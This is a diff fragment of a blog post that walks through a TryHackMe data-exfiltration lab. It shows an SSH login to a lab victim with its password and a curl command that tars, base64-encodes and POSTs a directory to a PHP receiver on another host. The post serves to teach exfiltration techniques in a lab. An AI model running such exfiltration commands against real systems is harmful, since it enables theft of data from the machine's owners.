CSpanias/cspanias.github.io/_posts/2023-10-20-Data Exfiltration.md

 The above PHP script will handle POST requests via the `file` parameter and store the received data in the `/tmp` directory as `http.bs64`.

-1. Now, from the JumpBox machine, we can connect via SSH to `victim1.thm.com`:
+1. Now, from the Jumpbox machine, we can connect via SSH to `victim1.thm.com`:

     ```shell
     ssh thm@victim1.thm.com
     # password: tryhackme
     ```

-2. Our goal is to transfer the `/home/thm/task6`'s content:
+2. Our goal is to transfer the `/home/thm/task6`'s content from `victim1.thm.com` to the `web.thm.com` server:

     ```shell
     curl --data "file=$(tar zcf - task6 | base64)" http://web.thm.com/contact.php